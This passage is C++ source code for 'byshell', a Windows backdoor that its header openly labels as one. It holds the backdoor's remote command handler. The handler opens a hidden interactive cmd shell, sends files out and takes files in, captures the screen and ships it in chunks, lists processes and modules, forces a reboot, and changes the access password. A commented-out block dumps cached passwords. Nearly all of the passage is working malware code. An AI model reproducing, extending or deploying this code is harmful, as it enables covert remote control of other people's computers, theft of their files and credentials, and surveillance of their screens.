ntboot.cpp

byshell后门源代码

	extshell.si.hStdError=extshell.hwrite;extshell.si.hStdOutput=extshell.hwrite;extshell.si.wShowWindow=SW_HIDE;
	extshell.si.hStdInput=extshell.cread;extshell.si.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
	if(!CreateProcess(0,cmdline,0,0,1,0,0,0,&extshell.si,&extshell.pi)){
		memset(workbuff,0,65520);strcpy(workbuff,"cmd bind error");*psendlength=strlen(workbuff);	return 0;
		}
	memset(workbuff,0,65520);Sleep(200);DWORD bytesread;ReadFile(extshell.hread,workbuff,65520,&bytesread,0);*psendlength=bytesread;return 1;
}
//endshell
if(workflag==1 && strncmp(workbuff,"endshell",8)==0){
	DWORD byteswritten;WriteFile(extshell.cwrite,"exit\r\n",6,&byteswritten,0);
	CloseHandle(extshell.hread);CloseHandle(extshell.hwrite);CloseHandle(extshell.cread);CloseHandle(extshell.cwrite);
	memset(workbuff,0,65520);strcpy(workbuff,"shell terminated\n");*psendlength=strlen(workbuff);	return 0;
}
//work in shell
//7Q in nc ok.but in my cli,cannot work.because mine doesnot send a \r\n.
//4Q in shell after type 'net user' & 'net user byf' a 'More?' appeared
//chage writefile para3 to a precise num but not 2048,solved.why??????????????
if(workflag==1 && strncmp(workbuff,"endshell",8)!=0){
	DWORD byteswritten=strlen(workbuff);WriteFile(extshell.cwrite,workbuff,byteswritten,&byteswritten,0);
	DWORD bytesread;Sleep(200);memset(workbuff,0,65520);PeekNamedPipe(extshell.hread,0,0,0,&bytesread,0);
	if(!bytesread){strcpy(workbuff,"pipe has no ret data\n");*psendlength=strlen(workbuff);return 1;}
	//like cmd ,but the case above maybe unable to appear.
	ReadFile(extshell.hread,workbuff,65520,&bytesread,0);
	*psendlength=bytesread;return 1;
}
//ok,shell complete
//byver
if(workflag==0 && strncmp(workbuff,"byver",5)==0){strcpy(workbuff,"byshell server version 0.63\nReleased Dec 19,2004 Copyleft@ \"by\" co.ltd.\n");
*psendlength=strlen(workbuff);	return 0;}
//reboot
if(workflag==0 && strncmp(workbuff,"reboot",6)==0){strcpy(workbuff,"rebooting...maybe on Win2k3 you cannot achieve it.\n");
HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);
TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME, &tp.Privileges[0].Luid);tp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,0,&tp, sizeof(tp),0,0);ExitWindowsEx(EWX_REBOOT,0x00050000);
*psendlength=strlen(workbuff);	return 0;}
//change pass
if(workflag==0 && strncmp(workbuff,"chpass",6)==0){
	strncpy(pwd,workbuff+6,16);memset(workbuff,0,65520);strcpy(workbuff,"chpass success\n");
	*psendlength=strlen(workbuff);	return 0;
}
//get local pass
//this api didnot be published by microsoft.5Q   used only in 9x!!!!!!!!!!
/*if(workflag==0 && strncmp(workbuff,"passdump",8)==0){
	HINSTANCE dllinst=LoadLibrary("MPR.DLL");
	if(!dllinst){memset(workbuff,0,65520);strcpy(workbuff,"loaddll error");*psendlength=16;return 0;}
	int (__stdcall *WNetEnumCachedPasswords)(LPSTR,DWORD,DWORD,void *,DWORD);
	WNetEnumCachedPasswords=(int (__stdcall *)(char *,unsigned long,unsigned long,void *,unsigned long))GetProcAddress(dllinst,"WNetEnumCachedPasswords");
	WNetEnumCachedPasswords(0,0,0xFF,cachecallback,0);
	FreeLibrary(dllinst);*psendlength=128;
	return 0;
}*/
/*
//CACHE PASSWORD结构
typedef struct tagPASSWORD_CACHE_ENTRY {
WORD cbEntry;//length of structure 
WORD cbResource;//resource name的字节长度
WORD cbPassword;//password的字节长度
BYTE iEntry;//entry index
BYTE nType;//type of entry
char abResource[1];//start of resource name,password immediately follows resource name
} PASSWORD_CACHE_ENTRY;

typedef BOOL (WINAPI *CACHECALLBACK)(PASSWORD_CACHE_ENTRY *pce,DWORD);

//CACHE PASSWORD函数原形
typedef WORD (WINAPI *PWNetEnumCachedPasswords)(
LPSTR pbPrefix,
DWORD cbPrefix,
DWORD nType,
CACHECALLBACK pfnCallback,
DWORD UNKNOWN
);
*/

//sysinfo
if(workflag==0 && strncmp(workbuff,"sysinfo",7)==0){UINT ret;void * retp;char syspath[512];
	DWORD cnamelen=128;memset(workbuff,0,65520);strcpy(workbuff,"\n**********************\nBasic information:\ncomputer name:\n");
	GetComputerName(syspath,&cnamelen);strcat(workbuff,syspath);
	MEMORYSTATUS mem;GlobalMemoryStatus(&mem);
	sprintf(syspath,"\nmemory:%dK\n",mem.dwTotalPhys);strcat(workbuff,syspath);OSVERSIONINFO osinfo;
	osinfo.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);GetVersionEx(&osinfo);strcat(workbuff,"OS_infomation:\n");
	switch(osinfo.dwPlatformId){case VER_PLATFORM_WIN32_NT:strcat(workbuff,"WindowsNT  ");break;case VER_PLATFORM_WIN32_WINDOWS:strcat(workbuff,"Windows9x  ");break;case VER_PLATFORM_WIN32s:strcat(workbuff,"Win3.1  ");break;default:strcat(workbuff,"??!!OS  ");}
	sprintf(syspath,"%d.%d,build %d\n",osinfo.dwMajorVersion,osinfo.dwMinorVersion,osinfo.dwBuildNumber);
	strcat(workbuff,syspath);strcat(workbuff,osinfo.szCSDVersion);
	strcat(workbuff,"\nsysDir:");GetSystemDirectory(syspath,256);strcat(workbuff,syspath);strcat(workbuff,"\n");
	//CPU(can retrieve serias number,but not implement)
	strcat(workbuff,"\n*******************************\nthe very CPU(used by our server code) information below is queried from CPU hardware:) so it is even more reliable then what M$ Wind0wZ shows\n");
	char cpubrand[128]={0};
	__asm{
	pushad
	mov eax,0
	cpuid
	mov dword ptr cpubrand,ebx
	mov dword ptr cpubrand+4,edx
	mov dword ptr cpubrand+8,ecx
	popad
	}
	strcat(workbuff,"CPU type:");strcat(workbuff,cpubrand);strcat(workbuff,"\ntype/family/model/stepping are too fussy so if you want directly use \'cmdset\'\n");
	__asm{
	pushad
	mov eax,80000002h
	cpuid
	mov dword ptr cpubrand,eax
	mov dword ptr cpubrand+4,ebx
	mov dword ptr cpubrand+8,ecx
	mov dword ptr cpubrand+12,edx
	popad
	}	
	strcat(workbuff,"CPU name:");strcat(workbuff,cpubrand);
	__asm{
	pushad
	mov eax,80000003h
	cpuid
	mov dword ptr cpubrand,eax
	mov dword ptr cpubrand+4,ebx
	mov dword ptr cpubrand+8,ecx
	mov dword ptr cpubrand+12,edx
	popad
	}	
	strcat(workbuff,cpubrand);
	__asm{
	pushad
	mov eax,80000004h
	cpuid
	mov dword ptr cpubrand,eax
	mov dword ptr cpubrand+4,ebx
	mov dword ptr cpubrand+8,ecx
	mov dword ptr cpubrand+12,edx
	popad
	}	
	strcat(workbuff,cpubrand);strcat(workbuff,"\n");
	//nativeAPI
	strcat(workbuff,"\n***********************************\nthe information below is queried by nativeAPI on win2k so maybe it cannot be used properly under other operating-system.\n");
	typedef unsigned long NTSTATUS;
	NTSTATUS (__stdcall *ZwQuerySystemInformation)( IN ULONG SysInfoClass, IN OUT PVOID SystemInformation,
                                               IN ULONG SystemInformationLength, OUT PULONG RetLen );
	typedef struct _SYSTEM_BASIC_INFORMATION {//0
	ULONG Unknown;
	ULONG MaximumIncrement;
	ULONG PhysicalPageSize;
	ULONG NumberOfPhysicalPages;
	ULONG LowestPhysicalPage;
	ULONG HighestPhysicalPage;
	ULONG AllocationGranularity;
	ULONG LowestUserAddress;
	ULONG HighestUserAddress;
	ULONG ActiveProcessors;
	UCHAR NumberProcessors;
	} SYSTEM_BASIC_INFORMATION;SYSTEM_BASIC_INFORMATION sysbinfo;
	retp=LoadLibrary("ntdll.dll");
	ZwQuerySystemInformation=(unsigned long (__stdcall *)(unsigned long,void *,unsigned long,unsigned long *))GetProcAddress((struct HINSTANCE__ *)retp,"ZwQuerySystemInformation");
	ZwQuerySystemInformation(0,&sysbinfo,sizeof(sysbinfo),(PULONG)&ret);
	sprintf(syspath,"PhysicalPageSize:0x%x\nNumberOfPhysicalPages:0x%x\nLowestPhysicalPage:0x%x\nHighestPhysicalPage:0x%x\nActiveCPUs:%d\nNumberCPUs:%d\n",
		sysbinfo.PhysicalPageSize,sysbinfo.NumberOfPhysicalPages,sysbinfo.LowestPhysicalPage,sysbinfo.HighestPhysicalPage,
		sysbinfo.ActiveProcessors,sysbinfo.NumberProcessors);
	strcat(workbuff,syspath);
	typedef struct _SYSTEM_CONFIGURATION_INFORMATION { // Information Class 7
	ULONG DiskCount;
	ULONG FloppyCount;
	ULONG CdRomCount;
	ULONG TapeCount;
	ULONG SerialCount;
	ULONG ParallelCount;
	} SYSTEM_CONFIGURATION_INFORMATION;SYSTEM_CONFIGURATION_INFORMATION syscinfo;
	ZwQuerySystemInformation(7,&syscinfo,sizeof(syscinfo),(PULONG)&ret);
	sprintf(syspath,"number_of_harddisk:%d\n",syscinfo.DiskCount);
	strcat(workbuff,syspath);
	typedef struct _SYSTEM_PROCESSOR_TIMES { // Information Class 8
	LARGE_INTEGER IdleTime;
	LARGE_INTEGER KernelTime;
	LARGE_INTEGER UserTime;
	LARGE_INTEGER DpcTime;
	LARGE_INTEGER InterruptTime;
	ULONG InterruptCount;
	} SYSTEM_PROCESSOR_TIMES;SYSTEM_PROCESSOR_TIMES sysptimearray[10];
	ZwQuerySystemInformation(8,sysptimearray,sizeof(SYSTEM_PROCESSOR_TIMES)*10,(PULONG)&ret);
	strcat(workbuff,"CPU using rates:\n(note:when time too large it will turn out to be a minus number)\n");
	for(UINT j=1;j<=sysbinfo.ActiveProcessors;j++){sprintf(syspath,"CPU%d: free time(IDLE time):%d,user-occupying time:%d\n",j,sysptimearray[j-1].IdleTime,sysptimearray[j-1].UserTime);strcat(workbuff,syspath);}
	
	strcat(workbuff,"\n****************************\ndisk partition informations:\n");
	for(char i[63]="A:\\";i[0]<='Z';++i[0]){
	ret=GetDriveType(i);switch(ret)
		{case DRIVE_FIXED:
		strcat(workbuff,strcat(i,"DRIVE_FIXED,hard disk.\n"));
		break;
		case DRIVE_CDROM:
		strcat(workbuff,strcat(i,"DRIVE_CDROM,CD-ROM,DVD-ROM or CD-RW,etc.\n"));
		break;
		case DRIVE_REMOTE:
		strcat(workbuff,strcat(i,"DRIVE_REMOTE,The drive is a remote (network) drive.\n"));
		break;
		case DRIVE_RAMDISK:
		strcat(workbuff,strcat(i,"DRIVE_RAMDISK,The drive is a RAM disk drive.\n"));
		break;
		case DRIVE_REMOVABLE:
		strcat(workbuff,strcat(i,"DRIVE_REMOVABLE,Floopy or U disk.\n"));
		break;
		case DRIVE_UNKNOWN: 
		strcat(workbuff,strcat(i,"DRIVE_UNKNOWN,The drive is a ???! drive.\n"));
		break;
		}
	memset(i+3,0,61);}strcat(workbuff,"***************************\nAlthough my soft can give you such information above,it is recommended for you to use a \'cmdset\' to see sth junk the M$ Wind0wZ returned for you.\n");
	*psendlength=strlen(workbuff);	return 0;
}


//get,workflag=2,not support dir get.filefp is a extvar.check loss packet & data diviion,and solve
//data division,especially TCP division,is BAD for us
//~~~~~~~~how can this be solved in PUT?the next division cannot pass the pwd check
//not check err packet,maybe in the TCP head it will be done.
//9Q send32K,OK,but in client recv 8K in first pack,many packs,glacier tells that more than 8K may be parted
//9Q:  winsock max 8096,BUT still in large file trans err occurs,4000
//begin
if(workflag==0 && strncmp(workbuff,"get",3)==0){char filename[255]={0};strcpy(filename,workbuff+3);
	CloseHandle(filefp);packnum=0;//first close handle and clean packnum!!
	filefp=CreateFile(filename,GENERIC_READ,0,0,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,0);//FILE_ATTRIBUTE_NORMAL ~~~~
	if(filefp==INVALID_HANDLE_VALUE){strcpy(workbuff,"no such file\n");*psendlength=strlen(workbuff);return 0;}
	memset(workbuff,0,65520);DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);	
	if(bytesread==4000){workbuff[0]=1;packnum=1;*psendlength=4005;return 2;}
	workbuff[4]='f';workbuff[0]=1;CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//redirect
if(workflag==2 && strncmp(workbuff,"redirect",8)==0){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff+8,4);memset(workbuff,0,65520);
	packnum=reqpacknum-1;SetFilePointer(filefp,4000*packnum,0,FILE_BEGIN);
	DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
	if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 2;}
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//continue
if(workflag==2 && strncmp(workbuff,"endget",6)!=0){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff,4);memset(workbuff,0,65520);
	if(reqpacknum!=packnum+1){strcpy(workbuff+5,"packet dropped\n");*psendlength=strlen(workbuff);return 2;}
	DWORD bytesread;ReadFile(filefp,workbuff+5,4000,&bytesread,0);
	if(bytesread==4000){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 2;}
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';CloseHandle(filefp);*psendlength=5+bytesread;return 0;
}
//
//client break
if(workflag==2 && strncmp(workbuff,"endget",6)==0){memset(workbuff,0,65520);CloseHandle(filefp);
strcpy(workbuff,"getting terminated\n");*psendlength=strlen(workbuff);return 0;
}
//get complete

//put,workflag=3
//begin
if(workflag==0 && strncmp(workbuff,"put",3)==0){packnum=0;char filename[255]={0};strcpy(filename,workbuff+3);
	filefp=CreateFile(filename,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);//FILE_ATTRIBUTE_NORMAL ~~~~
	if(filefp==INVALID_HANDLE_VALUE){strcpy(workbuff,"no privilege to write\n");*psendlength=strlen(workbuff);return 0;}
	memset(workbuff,0,65520);workbuff[0]=1;*psendlength=4;return 3;
}
//continue
if(workflag==3 && strncmp(workbuff,"endput",6)!=0){unsigned int rcvpacknum=0;memcpy(&rcvpacknum,workbuff,4);
	if(rcvpacknum!=packnum+1){memset(workbuff,0,65536);strcpy(workbuff,"redirect");packnum+=1;memcpy(workbuff+8,&packnum,4);packnum-=1;*psendlength=12;return 3;}
	DWORD byteswritten;WriteFile(filefp,workbuff+5,workbufflen-5,&byteswritten,0);
	if(byteswritten!=workbufflen-5){strcpy(workbuff,"file system error\n");*psendlength=strlen(workbuff);return 0;}
	if(workbuff[4]!='f'){packnum+=1;memset(workbuff,0,65520);packnum+=1;memcpy(workbuff,&packnum,4);packnum-=1;*psendlength=4;return 3;}
	CloseHandle(filefp);strcpy(workbuff,"file uploaded\n");*psendlength=strlen(workbuff);return 0;
}
//client break
if(workflag==3 && strncmp(workbuff,"endput",6)==0){CloseHandle(filefp);
strcpy(workbuff,"file upload terminated\n");*psendlength=strlen(workbuff);return 0;
}
//put complete
//screen,workflag=4,10Q/////////////////////////////////////////////////
//release the heap,or may cause the computer broken up.
//why cli recv a bmp larger than ser?
if(workflag==0 && strncmp(workbuff,"screen",6)==0){memset(workbuff,0,65520);
	HDC hdcScreen = CreateDC("DISPLAY", NULL, NULL, NULL); 
	HDC hdcCompatible = CreateCompatibleDC(hdcScreen); 
	HBITMAP hbmScreen = CreateCompatibleBitmap(hdcScreen,GetDeviceCaps(hdcScreen, HORZRES),GetDeviceCaps(hdcScreen, VERTRES)); 
	SelectObject(hdcCompatible, hbmScreen);
	BitBlt(hdcCompatible,0,0,GetDeviceCaps(hdcScreen, HORZRES), GetDeviceCaps(hdcScreen, VERTRES),hdcScreen,0,0,SRCCOPY);
	HANDLE DDBtoDIB( HBITMAP bitmap, DWORD dwCompression, HPALETTE  hPal,DWORD * sizeimage);
	pbitmapwithoutfileh=DDBtoDIB(hbmScreen, BI_RGB,0,&sizeimage);
	BITMAPFILEHEADER bfh;
	bfh.bfType = ((WORD)('M'<< 8)|'B');
	bfh.bfReserved1 = 0;
	bfh.bfReserved2 = 0;
	bfh.bfSize = 54+sizeimage;
	bfh.bfOffBits = 54;
	/*filefp=CreateFile("c:\\temp.bmp",GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0);
	DWORD byteswritten;WriteFile(filefp,&bfh,sizeof(BITMAPFILEHEADER),&byteswritten,0);
	WriteFile(filefp,(char*)pbitmapwithoutfileh,sizeof(BITMAPFILEHEADER)+sizeimage,&byteswritten,0);
	CloseHandle(filefp);*/

	memcpy(workbuff+5,&bfh,sizeof(BITMAPFILEHEADER));
	memcpy(workbuff+sizeof(BITMAPFILEHEADER)+5,(char*)pbitmapwithoutfileh,sizeof(BITMAPINFOHEADER));
	workbuff[0]=1;packnum=1;*psendlength=5+sizeof(BITMAPFILEHEADER)+sizeof(BITMAPINFOHEADER);
	return 4;
}
if(workflag==4){unsigned int reqpacknum=0;memcpy(&reqpacknum,workbuff,4);memset(workbuff,0,20);
	if(reqpacknum!=packnum+1){strcpy(workbuff+5,"packet dropped\n");*psendlength=strlen(workbuff);return 0;}//check,but not solve
	memcpy(workbuff+5,(char*)pbitmapwithoutfileh+sizeof(BITMAPINFOHEADER)+(reqpacknum-2)*4000,4000);
	if((reqpacknum-1)*4000<sizeimage){packnum+=1;memcpy(workbuff,&reqpacknum,4);*psendlength=4005;return 4;}
	memcpy(workbuff,&reqpacknum,4);workbuff[4]='f';GlobalFree(pbitmapwithoutfileh);*psendlength=5+sizeimage-(reqpacknum-2)*4000;return 0;
}
//end of screen,can be reused in memory transfer
//pslist:there are some bugs in the output,very ugly:)
if(workflag==0 && strncmp(workbuff,"pslist",6)==0){memset(workbuff,0,65520);strcpy(workbuff,"\nprocess:\npid\tfilename    \tnum_thread\tparentpid\n");
	HANDLE snapshot;snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
	struct tagPROCESSENTRY32 processsnap; processsnap.dwSize=sizeof(tagPROCESSENTRY32);
	char procinfo[255]={0};
	for(Process32First(snapshot,&processsnap);Process32Next(snapshot,&processsnap);){
	sprintf(procinfo,"%d\t%s\t%d\t%d\n",processsnap.th32ProcessID,processsnap.szExeFile,processsnap.cntThreads,processsnap.th32ParentProcessID);
	strcat(workbuff,procinfo);memset(procinfo,0,256);}
	CloseHandle(snapshot);*psendlength=strlen(workbuff);	return 0;
}
//modlist:tdlist maybe of no use,just retrieve th32ThreadID
//6Q:why this func cannot retrieve info from sys proc?not enough privilege
if(workflag==0 && strncmp(workbuff,"modlist",7)==0){char modinfo[255]={0};DWORD modpid;strncpy(modinfo,workbuff+7,256);memset(workbuff,0,65520);
	if(!atoi(modinfo)){strcpy(workbuff,"illogical pid,please input a pid\n");*psendlength=strlen(workbuff);return 0;}
	HANDLE hToken;OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);TOKEN_PRIVILEGES tp;tp.PrivilegeCount = 1;